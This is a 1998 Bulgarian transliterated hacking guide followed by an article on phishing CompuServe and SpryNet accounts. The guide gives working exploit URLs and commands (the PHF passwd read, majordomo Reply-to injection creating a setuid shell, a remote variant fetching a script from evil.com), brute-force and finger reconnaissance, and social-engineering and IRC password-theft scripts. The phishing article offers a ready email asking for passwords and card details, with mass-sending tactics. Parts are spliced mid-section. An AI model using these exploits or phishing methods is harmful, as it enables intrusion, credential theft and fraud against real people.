º º I taka, vzeli ste veche faila i ostava samo da se dekodira. Ako toiº ºsudurzha parolite, kakto faila po-gore sudurzha parolata na dtodd, toº ºniamate nikakvi problemi - dekodirate go i ste v sistemata. Ami ako neº ºiskate da hackvate accounta dtodd, ami vi triabva root, a za nego niamaº ºparola? Ili puk niama nito edin red s parola? I vuobshte ot kude togavaº ºsistemata znae kakva e parolata na potrebitel, chiato parola ia niama vº º/etc/passwd? º º Tui kato, za da se lognete v niakoia Unix mashina, sistemata triabva daº ºproveri dali ste vuveli pravilna parola, atributite na /etc/passwd saº ºtakiva, che da mozhe da go chete vseki. Tova oznachava, che vseki potrebitelº ºmozhe da pregleda passwd faila i da si go dekodira. Za da se izbegne tova, vº ºmnogo ot Unix mashinite sushtestvuva shadow fail. Nego mozhe da goº ºprochetete samo ako imate root account. V dadeniat po-gore primer simvolutº º"x" na miastoto na parolata ukazva na sistemata, che parolata triabva da seº ºtursi v shadow faila. V realnostta obache tozi simvol, kakto iº ºmestopolozhenieto na shadow faila e razlichno, v zavisimost ot operacionnataº ºsistema. Eto i malka tablichka, v koiato sa posocheni po-razprostraneniteº ºvidove Unix, put do shadow faila i simvola, s koito shadowa e oznachen vº ºpasswd: º º º º Unix Path to Shadow Token º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º AIX 3 /etc/security/passwd ! º º or /tcb/auth/files// º º A/UX 3.0s /tcb/files/auth/?/ * º º BSD 4.3 /etc/master.passwd * º º ConvexOS 10 /etc/shadpw * º º ConvexOS 11 /etc/shadow * º º DG/UX /etc/tcb/aa/user/ * º º EP/IX /etc/shadow x º º HP-UX /.secure/etc/passwd * º º IRIX 5 /etc/shadow x º º Linux 1.1 /etc/shadow * º º OSF/1 /etc/passwd[.dir|.pag] * º º SCO Unix #.2.x /tcb/auth/files// º º SunOS 4.1+c2 /etc/security/passwd.adjunct ##username º º SunOS 5.0 /etc/shadow º º System V Release 4.0 /etc/shadow x º º System V Release 4.2 /etc/security/* database º º Ultrix 4 /etc/auth[.dir|.pag] * º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Eto vi ia i temata za razmisul (ili niakolko nachina da vzemeteº ºfailovete s parolite): º º Razbira se, nai-lesno e da otidete do servera (lichno) i da siº ºizkopirate failovete, ako sysadmina neshto se e zaplesnal :-) º º Ok, a sega seriozno: º º Ako razpolagate s account v sistemata (mozhe i ot chesto sreshtanite otº ºtablicata po-gore), no ne ste uspeli da vzemete root (ili puk vi e murzialoº ºda puskate exploitove), mozhete da izteglite passwd faila. Kakto ste si vº ºUnix, napishete: º º cat /etc/passwd º º Tova shte izvede na ekrana sudurzhanieto mu. Ako ne se subira, opitaiteº ºtova: º º more /etc/passwd º º Posle ot logovete (vkliuchili ste gi, nali?) mozhete da si sglobiteº ºpasswd fail. Ili puk mozhete da si suzdadete sobstven takuv, sudurzhashtº ºsamo reda s accounta, koito vi interesuva, i sled tova da go razkodirate. Zaº ºsuzhalenie, tova raboti v sluchai, che parolite sa vutre v passwd, t.e. neº ºsushtestvuva shadow, tui kato dostup do shadow ima samo superusera. º º Drug nachin e chrez FTP - logvate se v FTPto i (ako mozhe), iztegliateº º/etc/passwd. Shansovete vi obache sa malki, zashtoto na povecheto mashiniº ºparolite za FTP servera sa otdelno ot shell parolite, t.e. vie si mislite,º ºche vizhdate /etc/passwd, a vsushtnost vizhdate ~ftp/etc/passwd. º º Ot tuk natatuk veche zapochva vasheto vuobrazhenie. Dal sum za primerº ºniakolko exploita, no ot vas zavisi da namerite nachin da iztegliteº ºfailovete. º º º º 3.2.1. PHF Exploit º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Tova e exploit, sushtestvuvasht v edin specifichen CGI script. Za celtaº ºmashinata, koiato shte hackvate, triabva da ima web server i da sushtestvuvaº ºtozi script. Dori ne e nuzhno da se connectvate kum servera s telnet iliº ºftp. Prosto v browsera si napishete (edin ot dvata varianta): º º http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd º º http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd º º Ako poluchite "The requested object doesn't exist" ili "404 object notº ºfound" ili neshto takova, znachi niamate dostup do tozi script, ili puk negoº ºgo niama na servera. Ako poluchite "Gotcha!", znachi sa vi zasekli, no maiº ºniama da stane takova neshto :-) Razbira se, mozhe i da vidite na ekrana siº ºsudurzhanieto na passwd. Togava - bravo! Ne znam dali shte mozhete daº ºizpulnite sushtoto za shadow faila (ako ima takuv), no ako uspeete daº ºizteglite passwd, probvaite i s shadow. Dori i da ne se dokopate do nego,º ºpone niama da vi se nalaga da pravite finger na servera (vizh 3.3. Bruteº ºForce). º º º º 3.2.2. WebGais Exploit º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º WebGais e interface kum turseshtia instrument GAIS. Toi instaliraº ºniakolko CGI scripta. Osnovniat instrument se kazva "webgais". º º Toi chete user form i posle startira GAIS search engine. Avtorut se eº ºopital da zashtiti programata si, kato ograzhda query-to v single quotes (')º ºi taka startira search engine chrez komandata "system". No toi e izpusnalº ºneshto mnogo vazhno, a imenno da maha simvolut ' ot queryto (tova se pravi vº ºGlimpse). º º Taka che, ako izpratim zaiavka ot sorta na: º º query=';mail+your@address.net º º # If the requestor email address matches one of these regexps, then º º # the list will be listed in the output of a lists command. Failure º º # to match any regexp excludes the list from the output. The º º # regexps under noadvertise override these regexps. º º advertise << END º º /.*/ º º END º º -- end lrazvan.config -- º º º º Failut po-gore ukazva na majordomo da vkliuchi tazi lista vuv vsiakakviº º"LISTS" zapitvania. º º Problemut e, che kogato serverut nameri lista, koiato ima edin ot teziº ºatributi ("advertise" ili "noadvertise"), toi shte se opita da supostaviº ºreply-to adresa na edin ot tezi shabloni. Za da napravi tova, toi izpolzvaº º"eval" komandata. º º Taka izglezhda PERL sorsa (procedurata do_lists) º º º º -- majordomo -- º º foreach $i (@array) { º º $command = "(q~$reply_addr~ =~ $i)"; º º $result = 1, last if (eval $command); º º } º º -- end majordomo -- º º º º $reply_addr e rezultat ot niakolko paranoichni validacii. Ne mozhe daº ºsudurzha <,>,[,],-,+,(,),; i t.n., no s niakolko trika tova niama da eº ºproblem :-). º º A sega za exploitite. Te sa dva, edin za lokalnite potrebiteli, koitoº ºprosto iskat edin setuid shell (s pravata na sobstvenika na servera,º ºobiknoveno majordomo.daemon), i edin za remote potrebitelite, koito mozhe daº ºiskat da si kopirat malko failove ili da izpulniavat komandi ot dalecheº º(starata "mail your@address.net < /etc/passwd" niama da raboti, sudurzhaº º'<'...). º º Local exploit: º º º º telnet localhost 25 º º helo localhost º º mail from: user º º rcpt to: majordomo (ili kakvoto e imeto na majordomo usera) º º data º º From: user º º To: majordomo º º Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod º º \${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro º º º º LISTS º º . º º quit º º º º "Reply-to" poleto vurshi tezhkata rabota. Mai nalaga obiasnenie. Purvo,º ºizpolzvame ${IFS} vmesto shpacii (poznaite zashto...), i '&&' vmesto ';'.º ºOperatorut '&&' vurshi v bash sushtoto, koeto i v perl. "a&&b" oznachavaº º"izpulni a i pri uspeh izpulni b". Adresut e napisan po takuv nachin, che daº ºpreminava prez testa, koito majordomo izpolzva (toi smiata, che e X400º ºadres). Taka che ne promeniaite nishto tam (e, komandite mozhe, no ne iº ºsintaksisut). Exploitut shte kopira /bin/bash kato /tmp/lord i shte promeniº ºpravata mu za dostup na 4777 (setuid + rwx za vseki). º º Za remote potrebitelite, smenete Reply-to poleto na neshto takova: º º º º Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS} º º /tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro º º º º Uverete se, che user@evil.com mozhe da se svurzhe ot remote saitut.º ºevil.com e vashiat site. Shte triabva da redaktirate "script" faila vuvº ºvashata home direktoria i da go nakarate da pravi vsichko, kakvoto iskateº º(veche mozhete da izpolzvate vsichki onezi "zabraneni simvoli"). º º º º 3.3. BRUTE FORCE º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Brute force se narichat opitite da se otgatne parolata na dadenº ºpotrebitel. Tova e nai-grozniat nachin za poluchavane na account, no chestoº ºe efektiven. Za celta si izbirate niakoi account i pochvate :-). Mozhete daº ºhackvate accountite ot tablicata po-gore, no samo niakolko ot tiahº ºprisustvat zadulzhitelno v edna Unix sistema, ostanalite sa chestoº ºsreshtani. Po-dobur nachin obache e da se opitate da poznaete parolata naº ºroot accounta, no tui kato tova v mnogo goliama chast ot sluchaite e trudno,º ºmozhete da kombinirate Brute Force s Rooting, t.e. da znaete login name-a naº ºniakogo, da mu otgatnete parolata, da vlezete v sistemata ot negovo ime i daº ºvzemete superuser status chrez Rooting. º º Mozhete da se ulesnite s edno mnogo cenno neshto, narecheno finger. Poº ºprincip dadenata mashina bi triabvalo da ima otvoren finger port. Vizhteº ºdali mozhete da se connectnete kum nego. Za celta izpolzvaite slednataº ºkomanda (na sobstvenata si mashina): º º telnet target.com 79 º º (pri Win95 mashini mozhe i "telnet target.com finger") Ako uspeete da seº ºconnectnete, serverut shte sedi i shte vi chaka, bez da vi izprashta nishto.º ºAko natisnete Enter (izpratite CR), serverut shte vi izvede spisuk naº ºvsichki potrebiteli, koito v momenta sa lognati v sistemata, koga sa seº ºlognali (v kolko chasa), kakto i "Idle", t.e. kolko vreme sa stoiali, bez daº ºpraviat nishto. Osven tova bi triabvalo da vidite i istinskite im imena.º ºIzberete si niakoi potrebitel i se connectnete pak kum finger porta. Toziº ºput vmesto da natiskate Enter, vuvedete username na potrebitelia, koito steº ºsi nabeliazali, i natisnete Enter. Niama da vidite tova, koeto vuvezhdateº º(osven ako niamate Local Echo), no serverut shte vi izvede informaciata zaº ºtozi potrebitel - imeto (istinskoto), adresa, telefona i t.n. Taziº ºinformacia vie mozhete da izpolzvate, nali znaete, tupaci vsiakakvi, niakoiº ºmozhe da si e vuvel kato parola sobstvenoto ime, drug - telefona...º ºKombiniraite tam kakto si iskate, mozhe i da se poluchi neshto. º º Sushtestvuvat programi za Brute Force. Te rabotiat na principa naº ºpassword crackerite, no ne se opitvat da dekodirat fail, ami se svurzvat sº ºdaden server i probvat paroli edna po edna (ot wordlist ili sluchainoº ºgenerirani), dokato uspeiat da vliazat. Za da si spestite obache dulgotoº ºchakane, e hubavo vse pak da opitate po goreposochenia nachin - daº ºkombinirate vsichko, koeto znaete za potrebitelia. º º Opitaite da vlezete bez parola, kakto i s parola samia username (zashtoº ºli si igraia vuobshte da go spomenavam tova). Sled tova opitaite s imeto naº ºpritezhatelia na accounta. Osven lichnite imena, parolite chesto bivat iº ºimenata na saprug/sapruga, gadzhe ili imenata na decata. Kupete/otkradneteº ºkniga-suvetnik, ot onia, deto roditelite gi chetat, za da reshat kak da siº ºkrustiat decata, ili poglednete v telefonnia si ukazatel i napravete spisukº ºna nai-chesto sreshtanite imena na list hartia ili vuv file. º º Ok, eto vi osnovnoto: º º 1. opitaite purvoto ime na potrebitelia º º 2. opitaite vashia spisuk s purvi imena, muzhki i zhenski º º 3. opitaite purvoto ime na potrebitelia, sus samotna cifra (1 do 9) otzadº º 4. opitaite purvoto ime na potrebitelia, s bukva (A do Z), zalepena otzadº º 5. opitaite vsichko, svurzano sus sistemata, na koiato ste v momenta. Akoº º ste na VAX pod VMS v Datapac, opitaite VAX, VMS, Datapac, X25 i t.n. º º 6. opitaite vsichko, svurzano s kompaniata/uslugata, ot koiato pritezhava-º º na sistemata. Ako potrebiteliat e na sistema, pritezhavana ot Pepsiº º Cola Co, opitaite Pepsi, Cola, Pepsico i t.n. º º 7. nakraia, opitaite parolite ot vashia spisuk s osnovni paroli. Toi ne º º triabva da e poveche ot 200 dumi. º º Pomnete: povecheto paroli se izbirat spontanno, za kakvoto si misli vº º momenta potrebiteliat (nali znaete kak e). Opitaite se da vniknete vº º misulta i obstanovkata na potrebitelia, da pomislite kakvo toi bi mogulº º da izmisli. Ako ne mozhete da napravite tova, prosto opitaite kakvotoº º vi doide na uma. º º º º 3.4. SOCIAL ENGINEERING º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Social Engineering mozhe da bude definirano po mnogo nachini, noº ºosnovnoto e: "Misrepresentation of oneself in a verbal manner to anotherº ºperson in order to obtain knowledge that is otherwise unattainable". Tova siº ºoznachava tochno "manipulacia, lugane i osnovno drunkane na gluposti". º º Social Engineering se pravi predimno po telefona. º º Eto i maluk primer. Hacker ima nuzhda ot informacia, naprimer account,º ºkoito ne mozhe da dokopa chrez prosto hackvane. Toi se obazhda doº ºkompaniata, koiato pritezhava sistemata, v koiato toi iska da pronikne, i imº ºkazva, che toi e Petar Ivanov ot kompaniata za poddruzhka na kompiutri, iº ºche toi triabva da im pregleda osnovno kompiutrite, ili da gi testva otº ºdaleche. No, bozhichko, niakoi se e osral i toi niama account. Dali ne biº ºmogla hubavata dama da mu dade edin, ta da mozhe toi da si svurshi rabotataº ºi da napravi vsichki shtastlivi? º º Izopachavane na istinata. Predstaviate se za niakogo, kogoto ne ste. º º Ako ste skeptichni, ne triabva da ste. Social Engineering e izprobvano iº ºse znae, che raboti. Tova e blagodarenie na fakta, che nai-golemiat propuskº ºv zashtitata na dadena kompania sa neinite sluzhiteli. Kompania mozhe daº ºsuzdade sistema s 20 paroli, no ako bezgrizhen rabotnik bez da iska dostaviº ºna hacker vsiaka edna ot tezi 20 paroli, vsichko gubi smisul. º º *Triabva* da imate glas za tova. Ako zvuchite kato 12-godishen, niama daº ºpoluchite nishto. º º Ako chovekut iska da se svurzhe s po-visoka instancia (koiato mozhe biº ºshte zapodozre neshto), poludeite. Ne pochvaite da vikate, no se razgnevete.º ºObiasnete, che imate rabota da vurshite, i budete ubeditelni. º º Prosto pomnete da budete spokoini, imaite rezerven plan, i e dobra ideiaº ºda imate scenarii na hartia, i da se uprazhniavate dosta. Ako zvuchiteº ºestestveno i avtoritetno, shte poluchite kakvoto iskate. A praktikata pomagaº ºchudesno. º º Drug nachin za Social Engineering e taka narechenoto "phishing". Tovaº ºoznachava chrez izmama da se doberete do accounta, kato mamite samia muº ºpritezhatel. Tuk otnovo ima kakvo da se misli. Mozhete naprimer da muº ºpoiskate konfiguracionni failove, v koito se suhraniava accounta (naprimerº ºCIS.INI), i ako tova e prosto potrebitel, koito ne znae nishto zaº ºizdainicheskite failove, mozhe i da gi poluchite. Drug nomer e da muº ºizpratite programa (ot taka narechenite "sniffers"), koiato uzh e suvsemº ºbezvredna, no vi izprashta suotvetnite failove (ili chasti ot tiah), ili pukº ºprosto logina i parolata, ili, da rechem, informacia za kreditna karta. º º Vuobshte, nachini mnogo, samo chovek vuobrazhenie da ima. No, otnovo,º ºtriabva da budete ubeditelni. º º Tova, za razlika ot purviat variant na Social Engineering, ne e nuzhnoº ºda se pravi po telefona (dazhe pochti nikoga ne se pravi). IRC, elektronnataº ºposhta ili kakuvto i da e drug nachin za on-line komunikacia (razbira se,º ºprivate) dava prekrasna vuzmozhnost da se predstaviate za niakogo, koitoº ºvsushtnost ne ste. º º Mozhete, naprimer, da izpratite na niakogo e-mail ot imeto na gadzhetoº ºmu, sudurzhasht niakakva programa i podkaniane da ia pusne. Za da ne seº ºusamni (ili da ne zadava vuprosi), message-a triabva da bude neshtoº ºpodkaniashto, ne turpiashto otlagane i t.n., naprimer "vizh go, kak ti seº ºstruva? Chakam!" ili neshto ot sorta. º º Drug nomer e da svaliate niakogo po IRC, predstaviaiki se za chovek otº ºdrugia pol (kakvo puk, ne mogat da vi proveriat po mrezhata), da muº ºprashtate naprimer snimka - izpulnim fail, koito obache vurshi i drugo, ili,º ºako chovekut ima niakakvi specifichni interesi - neshto po sluchaia.º ºPoprikazvaite i razberete. Tuk veche samo vie mozhete da si pomognete. º º Treti variant e da se opitate da izmuknete parolata na choveka po IRC.º ºZa da napravite tova shte vi triabvat dva otvoreni IRC klienta. Mozhete daº ºgo napravite i bez da imate OPove v kanala, no ako imate, shte budeteº ºpo-ubeditelni. Vsichko, koeto triabva da napravite, e da se preimenuvate vº ºedin klient "B0t" i da otvorite vtori klient. Ako niakoi iska da vzemeº ºopove, kazhete mu da prati message do B0t, taka che toi da mozhe da goº ºidentificira. Da, no botut ne e bot, ami vsushtnost ste vie. Na klient 2º ºnickname-a vi shte si bude normalniat vi priakor. Kazhete (ne prez "bota",º ºami prez normalnia klient) neshto ot sorta na: º º "za da vzemete opove, prosto pratete message na bota na kanala i toiº ºshte vi opne, purvo obache triabva da identificira DNSa, koito izpolzvate.º ºAko ne znaete kak, napishete /msg B0t identify then_yourpassword". º º Sled tova kazvate "E, beshe mi mnogo priatno, no triabva da vurvia".º ºPrichinata za tova e, che chovekut niama da zapodozre nishto. Po-malkoº ºveroiatno e toi da si misli, che prosto iskate da mu vzemete parolata, akoº ºne ste v kanala da ia vzemete. hehe. º º V tozi sluchai vie vse oshte ste v kanala, zashtoto sega se vrushtate vº ºklient 1, predstaviasht se za B0t, i chakate. Sled kato chovekut vi eº ºmessagenal parolata si, otgovorete (prez B0t) neshto kato: º º ime_na_choveka_ ok identified (zamazhete go kolkoto mozhete) º º Gotovo - veche imate parolata na choveka. Povecheto hora ne obichat daº ºpomniat poveche ot edna parola, taka che niama nishto chudno sushtata parolaº ºda se izpolzva i za web page ili e-mail ili neshto drugo. º º I taka, Social Engineering e neshto polezno, kolkoto i da vi se struvaº ºnevuzmozhno. Vse pak ne zabraviaite, che ne vsichki sa hackeri, znaeshtiº ºdostatuchno, za da ne se ostaviat da gi izmamiat, i mnogo malko hora bihaº ºzapodozreli neshto. º º º º 3.5. THRASHING º º úÄÄÄÄÄÄÄÄÄÄÄÄú º º º º E, tova e za hora s mnogo turpenie, no eto ia ideiata - tova e proces naº ºkradene na bokluka na kompaniite, preglezhdaneto mu i zapazvane na cennataº ºinformacia. º º Tova po princip e malko stranen metod, no ako se opitvate da hackneteº ºniakoia sistema, lokalna za vas, mozhe da e dobra ideia da se poroviteº ºniakolko sedmici, toku-vizh ste namerili razpechatka ili smachkan list sº ºdialup ili username i parola napisani na nego. º º Niama da vi ucha nito kak da se rovite v bokluka na kompaniite, nito kakº ºda vuzstanoviavate dokumenti, prekarani prez shreder - tova si e vashaº ºrabota. º º º º 4. Nqkoi po-interesni links º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º E, niamah dostatuchno vreme da zavursha tazi sekcia, no dori i malko,º ºinformaciata ot neia shte vi e polezna. Oshte poveche, che Internet e neshtoº ºmnogo dinamichno, taka che validni dnes vruzki utre mozhe i da ne rabotiat.º ºTaka che - tursete! Nqkoi ot linkowete sa dar ot EXo :*). º º º º http://www.hackersclub.com/km/library/ - goliama biblioteka hackerskiº ºtextove º º http://www.rootshell.com - e, cheli ste texta vnimatelno, nali? º º http://astalavista.box.sk - H/C/P Search Engine. º º http://www.box.sk/neworder - hacking texts, utilities, variousº ºinteresting informations, exploits, security º º http://www.lordsomer.com - izwesten oste kato The Hacker's Lair - namiraº ºse kakwo li ne info za kakwoto si poizkate º º http://www.microsoft.com - :) opa, tozi ne znam za kakvo shte viº ºposluzhi... º º http://www.thug4life.com - hackerski server, ima interesni raboti. Otº ºtuk mozhete da si izteglite John The Ripper. º º *VAZHNO* - ako teglite John The Ripper, vzemete 1.2 BETA 9 for Windows. Az º º izpolzvam neia i e stabilna i burza. Novata 1.3 ALPHA 1 for DOS º º e uzhasno nestabilna, che otgore na tova i bavna (okolo 10 puti º º po-bavna). º º º º E, tolkova ot men. (c) 1998 IronCode º º º º (B.Red. Towa e naj-golqmoto (zasega) rykowodstwo po hacking. Prawi chestº ºna IronCode, che se e hwanal i e sybral wsichkata tazi informaciq. Taka iliº ºinache textowe na temata se namirat dosta trudno, a i te w powecheto sluchaiº ºsa dosta starichki. Makar, che w tazi statiq nqma da namerite nistoº ºrewoliucionno nowo, tq ste byde polezna kakto za nachinaestie hackercheta,º ºtaka i za horata po-nawytre w nestata, zastoto e sistematizirana i qsnoº ºobqsnena. Dano zanapred i drugi se wkliuchat s podobni publikacii...º ºPhreedom nqma da otkave ! (i dano IronCode ne mi se syrdi za skobkite, koitoº ºse poqwqwat tuk tam kat B.Red :)) º º º º Hack the planet :) º º º ***** 4. Niakoi po-interesni links ***** Ç Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º CI$/SpryNet Account Phishing By: EXo º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ ÄÍÍÍÍÍÄ º º º º úÄ ÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Äú º º Ú ³ ³ Intro º º ÃÄÄÄ´ ³ What's Phishing ? º º ³ÚÄÙ³ ³ E-mail Phishing. º º ³ÚÄÄÙ ³ IRC Phising. º º ³ÀÄÄ¿ ³ Troyan Horse Phishing. º º ³ÚÄÄÙ ³ WEB Site Phishing. º º ÀÙ ú Ending Words º º Intro º º úÄÄÄú º º º º Ne sym siguren dali tochno sega e wremeto da publikuwam tazi statiq,º ºsled kato CI$ i Sprynet nqmat nito lokalni dial-in linii w BG nito swestniº ºwryzki s BG prez X.25 mrevite. Ne sym siguren dali wsichki weche ne saº ºnaqsno s towa kak se prawi Phishing - CI$ accountite sled kato grymnaº ºpraweneto na accounti s falshiwi CC-ta bqha wsichkite phishnati,º ºSpryNet-skite systo, a dosta hora wlizaha s compuserve.com domain (a move daº ºsa bili i poweche... towa sa mi lichnite nabliudeniq ot IRC). Ne sym sigurenº ºdali woobste ste si gubite wremeto da chetete taq statiq. No wse pak... tyjº ºkato nikoj ne se seti (a i move bi ne izkashe) da q napishe predi, a i ne eº ºkazano che CI$ i SpryNet nikoga nqma da ima weche, ste zapylnq nqkolko kb otº ºtaka ili inache tlystiq Phreedom 12. º º W tazi statiq ste se spra po-obshirno na metodite i nachinite zaº ºPhishwane na CI$ i SpryNet accounti. Makar che principno phishwaneto naº ºaccounti za drugi sistemi e pochti systoto, pri CI$ i SpryNet nestata stoqtº ºpo-razlichno, zastoto towa sa prekaleno globalni mrevi, informaciq zaº ºchiijto potrebiteli ima prysnata po celiq Internet. º º º º What's phishing ? º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º Kakwo e Phising ? (Typo naistina, ama se nalaga da spomenem) Phishing eº ºprocesa na sdobiwane s chuvd account za dadena sistema. Phishinga e izwestenº ºoste ot syzdawaneto na CompuServe, kato do nas dostiga w edin dosta razwitº ºstadii. Osnownata ideq e na Phishing-a e chrez razlichni metodi zaº ºubevdawane (ot naj-liubeznite predloveniq do naj-gnewnite zaplahi) da seº ºdokopame do accounta na syotweten potrebitel na dadena sistema (w sluchaqº ºCompuServe). Ne e zadylvitelno da poznawame vertwite (dave e zaº ºpreporychwane obratnoto) i towa e osnownoto predimstwo na Account Phishing.º º Imajte predwid, che na phishing se fastat samo naj-golemite balyci,º ºkoito w obstiq sluchaj ne znaqt kakwo e .exe file ili FTP - te polzwat I'netº ºsamo za e-mail i browsing ili w naj-dobriq sluchaj za IRC chat. Ako smqtate,º ºche choweka, kogoto ste reshili da metnete e "west w zanaqta" move spokojnoº ºda se otkavete, zastoto taka ili inache nqma da poluchite nisto, a i move daº ºsi nawlechete dopylnitelni problemi (ako toj wse pak se okave naistinaº ºkydyren). Nqmam predwid, che ste wi hwanat... za towa zakoni wse oste nqma -º ºtazi dejnost ne se klasificira kato nezakonna, a i e mnogo trudno da seº ºpriwedat kakwito i da e dokazatelstwa. Wypreki towa movete da se stoplite sº ºedin hubaw e-mail flood ili prosto da wi nuke/landbug/teardrop/bonk-natm,º ºkoeto si e krajno nepriqtno. º º Ima nqkolko osnowni metoda za phishing na accounti (ta dori i naº ºCCta...) º º 1. E-mail Phishing º º 2. IRC Phishing º º 3. Web Site Phishing º º 4. Troyan Horse Phishing º º Estestweno goreposochenite widowe phishing move da bydat kombiniraniº ºedin s drug, podobrqwani i t.n. Po-nadolu sym se sprql po-podrobno na wsekiº ºedin pootdelno. º º º º E-mail Phishing º º úÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Naj-razprostraneniqt i weroqtno naj-efektiwniqt nachin za phishing eº ºe-mail phishingyt. Osnowanta mu ideq e chrez izprastane na e-maili doº ºCompuServe/Spry potrebitelite da bydat nakarani da si izpratqt UserID-to iº ºPassworda (ta dori i CC-to) na predwaritelno podgotwen za celta e-mail. º º Pyrwo trqbwa da se podgotwi dostoweren, ubeditelen,º ºliubezno-podmazwazwast se text, kojto da se izprasta kato body na e-mail-a.º ºW nego move da se sydyrva plitka luva, koqto ste zabludi wseki po-bunak iliº ºpyk smyrtna zaplaha (kazwat, che wtoroto bilo po-uspeshno, no accountiteº ºgyrmeli po-byrzo). Naprimer: º º º º Dear CompuServe User, º º º º We've lost general information about your º º account and personal data. Please send reply to º º accbot4@instructor.net with your UserID, Password º º and Credit Card information. º º º º Thanks for your support. º º º º W gorniq e-mail se iska naprawo UserID, Password i CC, no w sluchaj cheº ºstawa duma za CompuServe, a ne Spry user, move da poiskate CIS.INI (w kojtoº ºse sydyra UserID-to i kodiran Passoword), kojto se namira w WinCIMº º(software-yt za wryzka s CI$) directoriqta ili dori i WINSIGN.DAT. Pyrwiqº ºfile go ima samo na po-starite wersii na WinCIM i toj sydyrva informaciq zaº ºCC-to na usera. º º Nikyde ne pishe, che trqbwa da ste tolkowa uchtivi, kolkoto w gorniqº ºe-mail. Move naprawo da zaplashite user-chet, che ste wdignete wyw wuzduhaº ºapartamenta mu, che go sledite ot 3-4 godini i weche znaete wsichko za negoº ºi.... i toj weroqtno ste se nasere i wednaga ste si izpee wsichko. No w toziº ºsluchaj oswen che ste wi izprati kakwoto poizkata ste se swyrve i s kukite aº ºi accountcheto dosta byrzo ste se sduha. º º 2. Trqbwa da si nabawite spisyk na vertwite, na koito ste prastateº ºe-mail. Towa move da stane po dosta razlichni nachini, no obiknoweno seº ºprawi s: º º ù CI$ Chat - tam winagi move da si namerite istinski e-mail adresi,º º ala wseki user, wlezyl w CompuServe Chat biwa preduprevdawan za takiwaº º kato nas. º º ù WEB Based Search Engine, kojto namira e-maili samo po danni zaº º domaina (kato HotBot ili Yahoo). º º ù Random Generated - move da si izberete i prozwolna kombinaciq otº º chisla ot wida 110715.xxxx ili 71334.xxxx, kydeto XXXX obiknoweno eº º chislo ot 1 do 3000. Pak stawa, no e mnogo po-neefektiwno. º º 3. Da si naprawite e-mail address w nqkoj ot free e-mail serveriteº º(naj-dobre e Iname, stoto tam move da se izbere i podhodqst domain). Bydeteº ºsigurni, che raboti predi da zapochnete systestwenata chast. Ako mislite,º ºche towa ne e dostatychno ubeditelno si kupete sobstwen domain (ot widaº ºwww.cis2.com). º º 4. Da podgotwite message za wseki edin ot user-ite, chiito adresi steº ºpodbrali i da im go pratite. º º 5. Da si proverqwate redowno e-maila i da imate gotownost da go zatrieteº ºsled 2-3 dena, ako ne se zatrie sam (t.e. ako ne go zakriqt prevdewremenno).º º Ako e dostatycho glupaw, useryt, kojto prochete po-gornoto syobstenieº ºwednaga ste se wturne da izprasta lichnite si danni na e-mail addresaº ºposochen w mail bodyto. Ako se useti, obache, e naj-weroqtno da signaliziraº ºna CI$ Support ili na firmata, koqto se qwqwa e-mail provider i prosto steº ºwi zatworqt e-maila. NIKOGA NE IZPOLZWAJTE SOBSTWENIQ SI ADDRESS !!! Move daº ºsi naprawite nqkolko (e-mail addressi) za po-udobno, zastoto chesto seº ºsluchwa e-mail serverite da filtrirat syobsteniqta (po message body ili poº ºizprastach...) i nisto da ne dostigne do vertwata ili syotwetno obratno doº ºwas, (dosta si e gadno...). Po-uspeshen e phishingyt kojto e praten directnoº ºot CompuServe (t.e. prez CI$, s pomostta na predwaritelno phishnat account),º ºzastoto inache postata ima I'net routing i ako onq sluchajno se zagledaº ºzadylvitelno ste se usymni. º º Posledniq pyt, kogato prawih e-mail phishing, prastah po edin e-mail zaº ºwseki 10 vertwi choweka (kato po 3000 sredno na den), kato imeto i UserID-toº ºot koeto gi prastah se smenqshe postoqnno, a message bodyto beshe napylnoº ºrazlichno za wseki 10 msg-ta. Wypreki towa mi gyrmqha dosta chestoº ºe-mailite, i idwaha maksimum po 10 otgowora (nqkoi ot koito gnewni zaplahi).º º º º IRC Phishing º º úÄÄÄÄÄÄÄÄÄÄú º º º º Wtoriqt wid phishing e IRC Phishing. Naposledyk, obache, toj e dostaº ºneproduktiwen, naj weche zastoto segashnite CompuServe/Spry useri izpolzwatº ºCI$ chat, kydeto obache oste s wlizaneto biwat preduprevdawani da bydatº ºpredpazliwi sresty ewentualni ataki. Togawa dori i otnowo da wlezat w IRCº ºte weche znaqt kak da se pazqt. º º Osnownata ideq na IRC Phishinga e pochti systata kato pri e-mailº ºphishinga, s tazi razlika, che on-line ubevdawate potrebitelite da wi zaematº ºq CIS.INI, q 